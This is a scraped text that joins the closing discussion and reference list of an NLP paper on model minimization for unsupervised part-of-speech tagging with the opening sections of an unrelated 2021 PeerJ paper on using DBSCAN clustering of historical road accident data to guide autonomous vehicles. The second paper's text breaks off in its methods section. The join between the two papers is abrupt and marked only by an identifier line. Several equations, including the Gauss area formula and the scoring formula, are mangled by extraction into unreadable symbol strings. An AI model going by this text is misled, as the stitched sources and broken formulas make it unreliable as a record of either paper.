formulation (rather than a two-step heuristic). Ravi et al. (2010a) also report further improve- ments using an alternative approach involving an ILP-based weighted minimization procedure. In Section 7 we briefly discuss how the DMLC method can be extended to this setting and combined with other similar methods. 7 Discussion and Conclusion We present a fast, efficient model minimization algorithm for unsupervised tagging that improves upon previous two-step heuristics. We show that un- der a fairly natural assumption of c-feasibility the solution obtained by our minimization algorithm is O(c log m)-approximate to the optimal. Although in the case of two-step heuristics, the first step guar- antees an O(log m)-approximation, the second step, which is required to get a consistent solution, can introduce many additional labels resulting in a so- lution arbitrarily away from the optimal. Our one step approach ensures consistency at each step of the algorithm, while the c-feasibility assumption means that the solution does not diverge too much from the optimal in each iteration. In addition to proving approximation guarantees for the new algorithm, we show that it is paralleliz- able, allowing us to easily scale to larger datasets than previously explored. Our results show that the algorithm achieves state-of-the-art performance, outperforming existing methods on several differ- ent tasks (both POS tagging and supertagging) and works well even with incomplete dictionaries and extremely low-resource languages like Malagasy. For future work, it would be interesting to apply a weighted version of the DMLC algorithm where la- bels (i.e., tag pairs) can have different weight distri- butions instead of uniform weights. Our algorithm can be extended to allow an input weight distribu- tion to be specified for minimization. In order to initialize the weights we could use existing strate- gies such as grammar-informed initialization (Ravi et al., 2010a) or output distributions learnt via other methods such as label propagation (Garrette and Baldridge, 2013). References 2013. Apache giraph. http://giraph.apache. org/. Michele Banko and Robert C. Moore. 2004. Part-of- speech tagging in context. In Proceedings of COLING, pages 556–561. Andrew R Barron, Jorma Rissanen, and Bin Yu. 1998. The Minimum Description Length Principle in Cod- ing and Modeling. IEEE Transactions of Information Theory, 44(6):2743–2760. Cristina Bosco, Vincenzo Lombardo, Daniela Vassallo, and Leonardo Lesmo. 2000. Building a Treebank for Italian: a data-driven annotation schema. In Proceed- ings of the Second International Conference on Lan- guage Resources and Evaluation LREC-2000, pages 99–105. Sabine Buchholz and Erwin Marsi. 2006. Conll-x shared task on multilingual dependency parsing. In Proceed- ings of CoNLL, pages 149–164. Christos Christodoulopoulos, Sharon Goldwater, and Mark Steedman. 2010. Two decades of unsupervised POS induction: How far have we come? In Proceed- ings of the Conference on Empirical Methods in Natu- ral Language Processing (EMNLP), pages 575–584. Dipanjan Das and Slav Petrov. 2011. Unsupervised part- of-speech tagging with bilingual graph-based projec- tions. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Hu- man Language Technologies - Volume 1, pages 600– 609. A. P. Dempster, N. M. Laird, and D. B. Rubin. 1977. Maximum likelihood from incomplete data via the EM algorithm. Journal of the Royal Statistical Society, Se- ries B, 39(1):1–38. Kuzman Ganchev, João Graça, Jennifer Gillenwater, and Ben Taskar. 2010. Posterior regularization for struc- tured latent variable models. Journal of Machine Learning Research, 11:2001–2049. Dan Garrette and Jason Baldridge. 2012. Type- supervised Hidden Markov Models for part-of-speech tagging with incomplete tag dictionaries. In Proceed- ings of the Conference on Empirical Methods in Nat- ural Language Processing and Computational Natu- ral Language Learning (EMNLP-CoNLL), pages 821– 831. Dan Garrette and Jason Baldridge. 2013. Learning a part-of-speech tagger from two hours of annotation. In Proceedings of the Conference of the North American Chapter of the Association for Computational Linguis- tics: Human Language Technologies, pages 138–147. Kevin Gimpel, Nathan Schneider, Brendan O’Connor, Dipanjan Das, Daniel Mills, Jacob Eisenstein, Michael Heilman, Dani Yogatama, Jeffrey Flanigan, and Noah A. Smith. 2011. Part-of-speech tagging for Twitter: annotation, features, and experiments. In Pro- ceedings of the 49th Annual Meeting of the Associa- tion for Computational Linguistics: Human Language Technologies: short papers - Volume 2, pages 42–47. Yoav Goldberg, Meni Adler, and Michael Elhadad. 2008. EM can find pretty good HMM POS-taggers (when given a good start). In Proceedings of ACL, pages 746–754. Sharon Goldwater and Thomas L. Griffiths. 2007. A fully Bayesian approach to unsupervised part-of- speech tagging. In ACL. Fernando C. Gomes, Cludio N. Meneses, Panos M. Pardalos, and Gerardo Valdisio R. Viana. 2006. Ex- perimental analysis of approximation algorithms for the vertex cover and set covering problems. Kazi Saidul Hasan and Vincent Ng. 2009. Weakly super- vised part-of-speech tagging for morphologically-rich, resource-scarce languages. In Proceedings of the 12th Conference on the European Chapter of the Associa- tion for Computational Linguistics, pages 363–371. Julia Hockenmaier and Mark Steedman. 2007. CCG- bank: A corpus of CCG derivations and dependency structures extracted from the Penn Treebank. Compu- tational Linguistics, 33(3):355–396. Mark Johnson. 2007. Why doesn’t EM find good HMM POS-taggers? In Proceedings of the Joint Conference on Empirical Methods in Natural Language Process- ing and Computational Natural Language Learning (EMNLP-CoNLL), pages 296–305. Philipp Koehn. 2005. Europarl: A Parallel Corpus for Statistical Machine Translation. In Machine Transla- tion Summit X, pages 79–86. Grzegorz Malewicz, Matthew H. Austern, Aart J.C Bik, James C. Dehnert, Ilan Horn, Naty Leiser, and Grze- gorz Czajkowski. 2010. Pregel: a system for large- scale graph processing. In Proceedings of the 2010 ACM SIGMOD International Conference on Manage- ment of data, pages 135–146. Mitchell P. Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated cor- pus of English: The Penn Treebank. Computational Linguistics, 19(2):313–330. Bernard Merialdo. 1994. Tagging English text with a probabilistic model. Computational Linguistics, 20(2):155–171. Taesun Moon, Katrin Erk, and Jason Baldridge. 2010. Crouching Dirichlet, Hidden Markov Model: Unsu- pervised POS tagging with context local tag genera- tion. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 196– 206. Joakim Nivre, Johan Hall, Sandra Kübler, Ryan McDon- ald, Jens Nilsson, Sebastian Riedel, and Deniz Yuret. 2007. The CoNLL 2007 shared task on dependency parsing. In Proceedings of the CoNLL Shared Task Session of EMNLP-CoNLL, pages 915–932. Sujith Ravi and Kevin Knight. 2009. Minimized models for unsupervised part-of-speech tagging. In Proceed- ings of the Joint Conferenceof the 47th Annual Meet- ing of the Association for Computational Linguistics and the 4th International Joint Conference on Natural Language Processing of the Asian Federation of Natu- ral Language Processing (ACL-IJCNLP), pages 504– 512. Sujith Ravi, Jason Baldridge, and Kevin Knight. 2010a. Minimized models and grammar-informed initializa- tion for supertagging with highly ambiguous lexicons. In Proceedings of the 48th Annual Meeting of the As- sociation for Computational Linguistics (ACL), pages 495–503. Sujith Ravi, Ashish Vaswani, Kevin Knight, and David Chiang. 2010b. Fast, greedy model minimization for unsupervised tagging. In Proceedings of the 23rd In- ternational Conference on Computational Linguistics (COLING), pages 940–948. Roi Reichart, Raanan Fattal, and Ari Rappoport. 2010. Improved unsupervised POS induction using intrinsic clustering quality and a Zipfian constraint. In Proceed- ings of the Fourteenth Conference on Computational Natural Language Learning, pages 57–66. Mark Steedman. 2000. The Syntactic Process. MIT Press, Cambridge, MA, USA. Kristina Toutanova and Mark Johnson. 2008. A Bayesian LDA-based model for semi-supervised part- of-speech tagging. In Advances in Neural Information Processing Systems (NIPS), pages 1521–1528. work_3bm3dechy5didpwd3zolcdcwti ---- Analysis of historical road accident data supporting autonomous vehicle control strategies Analysis of historical road accident data supporting autonomous vehicle control strategies Sándor Szénási1,2 1 Faculty of Economics and Informatics, J. Selye University, Komárno, Slovakia 2 John von Neumann Faculty of Informatics, Óbuda University, Budapest, Hungary ABSTRACT It is expected that most accidents occurring due to human mistakes will be eliminated by autonomous vehicles. Their control is based on real-time data obtained from the various sensors, processed by sophisticated algorithms and the operation of actuators. However, it is worth noting that this process flow cannot handle unexpected accident situations like a child running out in front of the vehicle or an unexpectedly slippery road surface. A comprehensive analysis of historical accident data can help to forecast these situations. For example, it is possible to localize areas of the public road network, where the number of accidents related to careless pedestrians or bad road surface conditions is significantly higher than expected. This information can help the control of the autonomous vehicle to prepare for dangerous situations long before the real-time sensors provide any related information. This manuscript presents a data-mining method working on the already existing road accident database records to find the black spots of the road network. As a next step, a further statistical approach is used to find the significant risk factors of these zones, which result can be built into the controlling strategy of self- driven cars to prepare them for these situations to decrease the probability of the potential further incidents. The evaluation part of this paper shows that the robustness of the proposed method is similar to the already existing black spot searching algorithms. However, it provides additional information about the main accident patterns. Subjects Autonomous Systems, Data Mining and Machine Learning, Spatial and Geographic Information Systems Keywords Data mining, DBSCAN, Road accident, Statistics, Autonomous vehicle, Road safety INTRODUCTION Human drivers have many disadvantages compared to autonomous vehicles (slower reaction time, inattentiveness, variable physical condition) (Kertesz & Felde, 2020). Nevertheless, they can often perform better (Chatterjee et al., 2002) in some unexpected situations like a child running out in front of the vehicle. Because beyond the information gained in real-time, they may have specific knowledge about a given location (linked to the previous example, the human driver may know that there is a playground without a fence near the road; therefore, the appearance of a child is not unexpected). Drivers also have some incomplete but useful historical knowledge about accidents and they can build this information into their driving behavior. If they know that there were several How to cite this article Szénási S. 2021. Analysis of historical road accident data supporting autonomous vehicle control strategies. PeerJ Comput. Sci. 7:e399 DOI 10.7717/peerj-cs.399 Submitted 13 October 2020 Accepted 28 January 2021 Published 23 February 2021 Corresponding author Sándor Szénási, szenasi.sandor@nik.uni-obuda.hu Academic editor Chintan Amrit Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.399 Copyright 2021 Szénási Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.399 mailto:szenasi.�sandor@�nik.�uni-obuda.�hu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.399 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ pedestrian collisions somewhere, they will decrease the speed and try to be more attentive without triggering real-time signals. Thanks to this behavior, they can prepare for and avoid some types of accidents, which were not possible without this historical data. Another example might be a road section, which is usually extremely slippery on rainy days. Real-time sensors can detect the element of slipping when it is too late to avoid the consequences. Some historical accident data can help to prepare the car for these unexpected situations. We propose the following consecutive steps to integrate historical data into the control algorithm for autonomous devices: 1. Localize accident black spots in an already existing accident database, using statistical or data-mining methods; 2. Determine the common reasons for these accidents with statistical analysis or pattern matching; 3. Specify the necessary preventive steps to decrease the probability of further accidents. This article mainly focuses on the first two steps because the third one largely depends on the limits and equipment of the self-driven car. For example, in the case of dangerous areas is it possible to increase the power of lights to make the car more visible? Or in the case of large chance of pedestrian accidents, is it possible to increase the volume of the artificial engine sound to avoid careless road crossing? Can the car change the suspension settings to prepare for potentially dangerous road sections? The scope of this paper is the development of the theoretical background to support these preliminary protection activities. The appropriate preliminary actions may significantly decrease the number and severity of road accidents. For example, Carsten & Tate (2005) present a model for the relationship between changes in vehicle speed and the number of occurred accidents. It is visible from this model (based on the national injury database of Great Britain to predict the effects of speed on road accidents) that for each 1 km/h change in mean speed, the best- estimated change of accident risk is 3%. Accordingly, it is worth making assumptions about the dangerous areas and adapting the control of the autonomous cars to these predictions. BACKGROUND Black spot identification Black spot management (identification, analysis, and treatment of black spots in the public road network) is one of the most important tasks of road safety engineers. The identification of these extremely hazardous sections is the first step to prevent further accidents or to decrease the seriousness of these. It is a heavily researched area, and there are several theoretical methods for this purpose. However it has a long tradition in traffic engineering; interestingly, there is not any generally accepted definition of road accident black spots (also known as hot spots), Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 2/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ the official definition varies by country. It follows that the method used to find these hazardous locations also varies by country. For example, by the definition of the Hungarian government, outside built-up area black spots are defined as road sections no longer than 100 meters where the number of accidents during the last three years is at least 3. According to this, road safety engineers use simple threshold-based methods (for example, the traditional sliding window technique) to find these areas. Switzerland uses a significantly different definition as black spots are sections of the road network (or intersections) where the number of accidents is “well above” the number of accidents at comparable sites. The key difference is the term “comparable sites” because these advanced comparative methods do not try to classify all road segments by itself but try to compare to similar areas. There are some general attributes of accident black spots to overcome the conceptual confusion. These are usually well-defined sections or intersections of the public road network, where road accidents are historically concentrated (Elvik, 2008; Delorme & Lassarre, 2014; Murray, White & Ison, 2012; Montella et al., 2013; Hegyi, Borsos & Koren, 2017). Nowadays, road accidents are monitored by the governments and all data about accidents are stored in large, reliable and partially public databases (without any personal information about the participants). Much data about the road network is also available (road layout, speed limits, tables, etc.). As a result, road safety engineers can use several procedures from various fields (statistics, data mining, pattern recognition) to localize accident black spots in these databases. It is a common assumption that the number of accidents is significantly higher at these locations compared to other sections of the road network. However, this alone is neither a necessary nor sufficient condition. The variation of the average yearly accident count of road sections is relatively high compared to the number of accidents. Because of this, the regression to the mean effect can distort the historical data. A given section with more accidents than average is not necessarily an accident black spot. The converse is also true, as there may be true black spots with relatively few accidents for a given year. However, this deficiency is already theoretically proven as most black spot identification methods are based on the accident numbers of the last few years, simply because this is the best place to start a detailed analysis. Nevertheless, it is always worth keeping in mind that these locations are just black spot candidates, but it needs further examination to make the right decision concerning them. The best way to do this is via a detailed scene investigation, but it is very expensive and time-consuming. Another theoretical approach can be the analysis of accident data to find some irregular patterns and identify one or more risk factors causing these accidents. Without these, it is possible that the higher frequency of accidents is purely coincidental at a given location and time. To localize potential accident black spots, the most traditional procedure is the sliding window method (Lee & Lee, 2013; Elvik, 2008; Geurts et al., 2006). The input parameters of Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 3/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ the process are the section length and a threshold value. The method is based on the following: 1. Divide the selected road into small uniform sized sections; 2. Count the number of accidents that have occurred in the last few years for each section; 3. Flag the segments where this number is higher than a given threshold as potential black spots. There are many variants of the proposed traditional sliding window method (Anderson, 2009; Szénási & Jankó, 2007). A potential alternative is to use variable window length. One of its advantages is that it is unnecessary to set the appropriate parameter, but sufficient to give a minimal and maximal value. The method can try several window lengths to find the largest black spots possible. Due to this modification, it can find small local black spots and larger ones too. The traditional sliding window method uses non- overlapping segments, but it is also possible to slide the window with smaller steps than the window size. This leads to a more sensitive method, which can find more black spot candidates. However, it is also necessary to manage the overlapping black spots (considering these as one big cluster, or multiple distinct ones). It is worth mentioning that the method has some additional advantages: it has very low computational demand (compared to the alternatives) and is based only on the road accident database. The sliding window method is one of the first widely used procedures; therefore, it is based on the traditional road number + section number positioning system (for example, the accident location is Road 66, 12+450 kilometer+meter). This traditional positioning system was the only real alternative in the past. However, in the last decades, the spreading of GPS technology makes it possible to collect spatial coordinates of accidents. This step has several benefits (faster and more accurate localization) but also requires the rethinking of the already existing methods. It is possible to extend the sliding window method to a two-dimensional procedure, but it is not widely used. It is better to seek out better and more applicable methods fitting to the spatial systems given by the GPS coordinates. From this field, Kernel Density Estimation (KDE) methods are one of the most popular spatial data analysis techniques (Bíl, Andrášik & Janoška, 2013; Flahaut et al., 2003; Anderson, 2009; Yu et al., 2014; Toran & Moridpour, 2015). These have been employed in many research projects to analyze road accidents. KDE methods have the advantages of simple implementation and easy understanding. These also have the benefit to naturally handle the noise of the data (caused by inaccuracy of GPS devices). In general, KDE is used as an estimation of the Probability Random Function of a random variable. From the safety experts’ point of view, the result of the KDE method is the accident density estimation at a given reference point. The procedure has several parameters, like the search radius distance from the reference point (bandwidth or kernel size) and the kernel function. Several researchers recommend the use of empirical Bayesian methods combining the benefits of the predicted and historical accident frequencies. These models usually analyze the distributions of the already existing historical data from several aspects, and Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 4/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ give predictions about the expected accident state. In the Empirical Bayesian method, the existing historical accident count and the expected accident count predicted by the model are added using different weights (Ghadi & Török, 2019). Because of this, this process requires an accurate accident prediction model. Another group of already available methods is based on clustering techniques. These procedures are from the field of data mining, where clustering is one of the widely used unsupervised learning methods. In this context, a cluster is a group of items, which are similar to each other and differ from items outside the cluster. Accidents with similar attributes (where properties can be the location and/or another risk factor(s)) can be considered as one cluster, using this concept in the field of black spot searching. Most studies use the basic K-means clustering method (Mauro, De Luca & Dell’Acqua, 2013), but there are also some fuzzy-based C-means solutions. As already mentioned, the results of the proposed methods are just a set of black spot candidates. It needs further analysis to make a final, valid decision as to whether it is a real accident black spot or not. Furthermore, whether or not it requires any actions. This is the point where our research turns away from traditional road safety management work (identification and elimination of black spots). Based on the collected clusters, road safety engineers must select the black spot candidates having the largest safety potential, which is based on the prediction of the effect of the best available preventive action (cost of the local improvement activity compared to the expected befits in the number and severity of further accidents). From the perspective of autonomous car control, the role of this safety potential is essential. The self-driven car has no options to solve road safety problems. The only important information is the existence of accident black spots and the potential safety mechanisms, which may help to avoid further crashes. As a second difference, from the road safety engineers’ point of view, it is not necessary that the accidents of a given black spot have common characteristics. The hot spot definition of this paper assumes that accidents of a given cluster have similar attributes because this pattern will be the basis of the preventive actions. The localization of accident black spot candidates is a heavily researched area and there are several fully-automated methods to find these. Nevertheless, the further automatic pattern analysis of these is not as well developed. This phase usually needs a great deal of manual work by human road safety experts (they must travel to the scene and investigate the environment to support their decisions about recommended actions). However, this process is supportable by some general rules but is mostly done manually using the pattern matching capability of the human mind. To fully automate it, it is necessary to make this method applicable to self-driven cars. According to this objective, this paper focuses on the help for autonomous vehicles to take the appropriate preventive actions to avoid accidents: � Localize black spot candidates using historical accident database; � Make assumptions about the common risk factors and patterns of these accidents; � According to these preliminary results, the autonomous device will know where the dangerous areas are and what preventive actions to take. Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 5/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ Automated accident prevention Autonomous vehicles will have several ways to avoid accidents and, therefore, is a hot, widely researched topic. Nevertheless, most papers deal with options existing only in the far future when autonomous devices will be a part of a densely connected network without any human interferences. Real-world implementations are far from this point, but some technologies already exist, although they are not closely related to autonomous vehicles. Currently, implemented accident prevention systems are built into traditional cars as braking assistants, etc. However, it is worth considering these because such methods will be the predecessor of the future techniques applicable to self-driven vehicles. The two main classes of accident prevention systems are passive and active methods. Passive systems send notifications to the driver about their warnings but do not perform any active operations. On the contrary, active methods have the right to perform interventions (braking, steering, etc.) to avoid accidents. It seems obvious that these prevention systems have a large positive impact on accident prevention, and it has already been proven by Jermakian (2011) that passive methods have significant benefits. There are more than one million vehicle crashes prevented in the USA each year. As Harpen proved (Harper, Hendrickson & Samaras, 2016), the cost-benefit ratio of these systems is also positive. Brake assist systems are one of the most researched active systems, where the potential benefits are the lower risk of injury, and the less serious injuries of the pedestrians (Rosén et al., 2010). Current forward-looking crash avoidance systems are usually continuously scanning the space in front of the vehicle using various devices (camera, radar, LIDAR, etc.). If any of these detects an unexpected vehicle or pedestrian, the brake assistant system takes the appropriate (preliminary) actions, which can be the enforcement of the braking system or direct autonomous emergency braking. Bálint, Fagerlind & Kullgren (2013) presented very promising results with a test-based methodology for the assessment of braking and pre-crash warning systems. These typically are only using the real-time information given by the vehicle sensors without any knowledge extracted from historical accident data. Run-time crash prediction models are also related to the topic of this paper. Hossain et al. (2019) presented a comprehensive comparison and review of existing real-time crash prediction models. The basic assumption of these systems is that the probability of a crash situation within a short time window is predictable by the current environmental parameters measured by the sensors. Therefore, most of the already existing methods use only the acquired sensor data to make real-time decisions about potential crash situations. According to this assumption, authors do not use the already existing accident databases as an input to fine-tune the system’s predictions. The work of Lenard, Badea-Romero & Danton (2014) is closer to the research presented in this paper. They analyzed the common accident scenarios to support the development of autonomous emergency braking protocols. Based on the hierarchical ascending method in two British accident databases filtered by some previously defined conditions (they use only the urban pedestrian accidents that occurred in daylight and with fine Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 6/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ weather conditions), attributes of the most common accident scenarios were presented. This paper defines the major accident scenarios and classifies all existing pedestrian accidents into one of these categories. The results of this research would be useful in the training phase of a self-driven vehicle to introduce all possible scenarios to the algorithm. The objective of Nitsche et al. (2017) is similar, which proposes a novel data analysis method to detect pre-crash situations at various (T- and four-legged) intersections. The purpose of this work is also to support the safety tests of autonomous devices. They clustered accident data into several distinct partitions with the well-known k-medoids procedure. Based on these clusters, an association rules algorithm was applied to each cluster to specify the driving scenarios. The input was a crash database from the UK (containing one thousand junction crashes). The result of the paper contains thirteen crash clusters, describing the main pre-accident situations. MATERIALS AND METHODS Black spot candidate localization Density-based spatial clustering of applications with noise For the black spot candidate localization step, the Density-Based Spatial Clustering of Applications with Noise (DBSCAN) algorithm was used. It is not widely used in the field of road safety engineering; however, it is one of the most efficient density-based clustering methods from the field of data mining. The main objective of density-based clustering tasks is the following: the density of elements within a cluster must be significantly higher than between separate clusters. This principle distinguishes the two distinct classes of elements: items inside a cluster and the outliers (elements outside of any cluster). According to the road safety task, elements are the accidents in the public road network. These are identified by spatial GPS coordinates and have several additional attributes (time, accident nature, etc.). The general DBSCAN method needs a definition for distance calculation between two elements. In the case of road accidents, the Euclidean distance between the two GPS coordinates was used (black spots are usually spread over a small area. Therefore, it is a good estimation of the real road network distances). The DBSCAN method requires two additional parameters: � ε: a radius type variable (meters); � MinPts: the lower limit for the number of accidents in a cluster (accidents). The main definitions of the DBSCAN algorithm are as follows: � ε environment of a given x element is the space within the ε radius of the x element; � x is an internal element if the ε environment of the given x contains at least MinPts elements (including x); � x is directly densely reachable from y means that x is in the ε environment of y which is an internal element; � x is densely reachable from y if it is accessible through a chain of directly densely reachable elements from y; Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 7/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ � all points not densely reachable from an internal element are the outliers; � if x is an internal element then it forms a cluster together with all densely reachable elements from x. The objective of the process is to find clusters of accidents in the public road network in which all elements are densely connected, and no further expansion is possible. The steps to achieve this are as follows: 1. Select one internal element from the accident database as the starting point. This will be the first point of the cluster. 2. Extend the cluster with all directly densely reachable elements from any point of the cluster recursively. 3. If it is not possible to extend the cluster with additional points, the cluster can be considered as final (it contains all the densely reachable items from the starting point). If this cluster meets the prerequisites for a black spot candidate, it is stored in the result set. 4. Repeat steps 1–3 for all internal elements of the database. The result of the presented procedure is a set of black spot candidates. The prerequisites of Step 4 can be one or more of the following: � The number of accidents should be more than a given threshold. � The accident density of the given area should be more than a given threshold. The proposed method has several advantages over the traditional methods. Unlike the sliding window algorithm, which analyzes only the accidents of a given road section, the DBSCAN is a spatial algorithm managing all accidents of the database together. This difference would be substantial in the case of junctions where the accidents of the same junction were assigned to different road numbers. This can be especially critical in the case of built-up areas and traffic roundabouts, where the number of connected roads is high. Determination of accident density One of the benefits of the traditional sliding window method is that it is easy to interpret for human experts. The number of accidents in a given road section is a very informative number. It is also easy to calculate some derived values, like the accident density, which is the number of accidents divided by the length of the road section. This divisor is often extended with the traffic rate or the time period length values. In the case of spatial black spot localization techniques, the definition of road accident density is more complex. These methods are not based on road sections, so division by the section length is not applicable. It is necessary to calculate the area of the black spot to use it as a divisor somehow. This article proposes a novel method to calculate the area of the region spanned by the black spot accidents. It finds the smallest boundary convex polygon containing all Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 8/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ accidents of a given cluster. The density of the black spot will be the number of accidents divided by the area of this polygon. The area is calculated by the Gauss’ area formula Eq. (1). aðCÞ¼ Pn�1 i¼1 xiyiþ1 þxny1 � Pn�1 i¼1 xiþ1yi �x1yn �� 2 ¼ x1y2 þx2y3 þ…þxn�1yn þxny1 �x2y1 �x3y2 �…�xnyn�1 �x1ynj j 2 (1) where � a(C): the area of the C polygon (cluster); � n: the number of vertices of the polygon; � (xi, yi): the two-dimensional coordinates of the i-th vertex of the C polygon (where i ∈ {1, 2, …, n}). If the number of accidents is less than three, the proposed area concept is not applicable. However, clusters with one or two accidents are usually not considered as black spot candidates. Therefore, this is not a real limitation. In the case of clusters with more than two accidents, the accident rate is calculated as Eq. (2). rðCÞ¼ jCj aðCÞ (2) where � ρ(C): the accident density of the C cluster; � |C|: the number of accidents in the C cluster. The formula requires the sequence of corner coordinates of the polygon in a given order (in this case, a clockwise direction). The traditional DBSCAN algorithm continuously builds the polygon from a starting point and the result is a set of accidents. Consequently, there should be an additional step to give the corner points in the appropriate order. It is possible to do this after the DBSCAN finishes, but it is also possible to extend the DBSCAN method with the following steps: � In the case of the first (P1) and second (P2) items, the concept of “polygon” cannot be interpreted. Hence, these are automatically marked as further corner points of the polygon. � With the third point (P3), the items already form a polygon. The p3 point must be on the right side of the vector P1P2 �� , which can be checked using a scalar multiplication to ensure the clockwise direction requested by the Gauss formula. If this is not the case, it is necessary to change the order of P1 and P2. After that step, P1, P2 and P3 will be the corner points of the polygon in a clockwise direction. � For every additional point (P5, P6, . . ., Pn), it must be checked that the additional point is inside the actual boundary convex polygon or not. It is possible to check that the new Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 9/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ point (Pnew) is on the right side of the boundary vector or not. If it is true for each vectors, the point must be inside the polygon (or in the border). Therefore, it is not necessary to modify the shape. If the new point is on the left side of any boundary vectors, then it is outside the boundary convex polygon. There must be a sequence of one or more consecutive vectors breaking the rule. Let k and l be the first and last vectors of this sequence. It is possible to substitute the Pk�1; Pk; Pkþ1; . . . ; Pl�1; Pl; Plþ1 part of the boundary vector list with Pk − 1, Pnew, Pl + 1. Because of the convexity of the original polygon, the Pk − 1, Pnew, Pl + 1 triangle contains all the Pk; Pkþ1; . . . ; Pl�1; Pl points, and the transformation also ensures the convexity of the new polygon and the clockwise direction of the corner points. Three figures about this process have been attached to the article in the Supplemental File “DBSCAN images”. It is possible to calculate the black spot area and the accident density of a given cluster using the previous method. Analysis of black spot candidates The result of the various black spot localization algorithms (sliding window, clustering, etc.) is a list of potential hot spots. However, having some accidents in a cluster does not mean that the hazard of accidents is significantly higher here. It is usually accepted by researchers that the number of accidents in a given area (section) of the road network fits the Poisson distribution. A special feature of road accident distribution is that the number of accidents is relatively low (compared to the size of the road network), and the variance is high. Therefore, the volatility of the accident number is very high, which means that a given cluster where the number of accidents is above the average is not inevitably a hot spot. The list given by the previous methods needs further examination to find the real hazardous sites. At this point, the methodology of this paper significantly differs from the work of road safety engineers. Their objective is to find hazardous sites and take the appropriate actions to decrease the probability of further accidents. They must select the sites having the largest safety potential where the best cost-effective actions can be taken to decrease the number and severity of accidents. It is a very complex procedure based on the data of historical accidents, the expected number of accidents, the environmental conditions and the cost/expected benefits of different safety actions. Contrary to this, the objective of a self-driven car is not the elimination of road safety problems. As an ordinary participant of traffic, it has no chance to make the road network better. Nevertheless, as a passive participant, it should be able to localize the problematic areas, analyze these, and take the necessary preliminary steps to avoid further accidents. Another difference between the methods of these fields is that from the perspective of road safety engineers, it is not necessary that the accidents of a given black spot have any special patterns or common characteristics. For the self-driven car, the localization of high-risk areas where the number of accidents is significantly higher than expected is Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 10/25 http://dx.doi.org/10.7717/peerj-cs.399#supplemental-information http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ not enough because this fact does not help to take the appropriate preliminary steps. This is the reason why this paper focuses on the identification of accident reasons. The result of this further investigation can be one of the following: � If it is not possible to identify any unexpected pattern in the accident attributes then the cluster cannot be considered as an accident black spot. The high number of accidents is just a coincidence and there are no suggestions to avoid further crashes. � In contrast, if there is a special pattern in the accident attributes then this cluster has the potential to decrease the probability of further crashes. These reasons for similar accidents would be related to the road network, weather, lighting conditions or human errors (drivers and pedestrians). In the second case, the knowledge of this special pattern (the common reasons for accidents in the same cluster) can be essential. It is presumable that it is possible to avoid accidents caused by the car itself. For example, if it is visible from the accident database that the number of accidents caused by slippery road is significantly higher than expected in a given area, the self-driven car should decrease the speed or change its trajectory to reduce the probability of this event. However, it is also worth noting that the preliminary actions can be very useful to decrease the probability of accidents caused by other drivers or pedestrians. For example, if the historical accident data contains patterns that the number of accidents caused by pedestrians is higher than expected, then the self-driven car would proactively try to decrease this negative potential using some type of visual or auditory warning or decreasing speed. Deducing the environmental reasons for accidents Accident databases usually contain certain taxonomy for accident types. These are usually structured classes of specific events and reasons, and scene investigators must classify each accident into one of these categories, which is very important statistical information. This method has several limitations because it is rare when the occurrence of an accident originates in one specific reason. Usually, multiple reasons, forming a complex structure, cause an accident. For example, the investigator codes the accident as a type of “catching-up accident”, but this does not give any information about why the accident occurs. It is also typical that most of the accidents in the Hungarian road network are caused by “incorrect choice of speed”. However, it is obvious that not just the speeding itself was the triggering reason for these accidents. There should be other factors (besides, it is unarguable that speeding increases the effects of other factors and makes certain accidents unavoidable). Based on these experiences, this paper does not try to assign all accidents to mutually exclusive accident reason classes. Contrarily, the proposed method defines several potential accident reasons, which are not mutually exclusive. These factors can be complementary and having different weights and roles in the occurrence of the accident. Only the reasons with potential preventive operations are discussed because these have valuable information for the self-driven car. Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 11/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ The proposed method is based on the following consecutive steps: 1. All known accidents are analyzed by all possible accident reasons, and a score value is assigned to the accident showing how much the accident is affected by a given factor. 2. The distribution of these score values is approximated by the examination of all known accidents. 3. Based on the result of the previously presented DBSCAN algorithm, the distribution of these score values is also calculated for each black spot candidate. 4. The distributions for all accidents and a given black spot are compared. If the distribution of a given factor is significantly differing (to the positive direction), the cluster is marked as a hazardous area for the given factor. The independent accident reason factors, like “slippery road”, “bad visibility”, “careless pedestrians”, etc. are defined as R1, R2,…, RN, where N is the number of these. As discussed previously, these reasons are not stored directly in the database but can be inferred from the general attributes of accidents. A scoring table is used for this purpose: the weights of the i-th accident factor (1 ≤ i ≤ N) is stored as Wi; where Wiattr = value shows the score for the Ri accident reason when the attr attribute equals to value. Accordingly, the cumulative score of the Ri reason for the x accident is Eq. (3): SiðxÞ¼ X 8attr2AðxÞ Wiattr¼x:attr (3) 